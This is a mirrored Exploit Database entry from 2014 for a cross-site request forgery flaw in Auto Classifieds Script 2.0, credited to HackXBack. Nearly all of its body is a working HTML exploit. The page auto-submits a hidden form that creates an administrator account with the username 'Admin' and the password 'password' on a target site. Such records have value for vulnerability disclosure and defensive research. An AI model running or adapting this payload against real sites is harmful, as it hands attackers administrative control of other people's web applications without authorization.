Auto Classifieds Script 2.0 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 118 阅读

• 作者： HackXBack
  日期： 2014-01-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/30909/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37

  Auto Classifieds Script v2.0 - CSRF Vulnerabilty [Add Admin] ====================================================================   #################################################################### .:. Author : HackXBack .:. Contact: h-b@usa.com .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.phpjabbers.com/preview/auto-classifieds-script/   ####################################################################   ===[ Exploit ]===   Cross Site Request Forgery ===========================   [Add Admin]   <html> <body onload="document.form0.submit();"> <form method="POST" name="form0" action=" http://www.site.com/index.php?controller=AdminUsers&action=create"> <input type="hidden" name="user_create" value="1"/> <input type="hidden" name="Full_name" value="Iphobos"/> <input type="hidden" name="username" value="Admin"/> <input type="hidden" name="password" value="password"/> <input type="hidden" name="status" value="T"/> <input type="hidden" name="role_id" value="1"/> </form>   </body> </html>     ####################################################################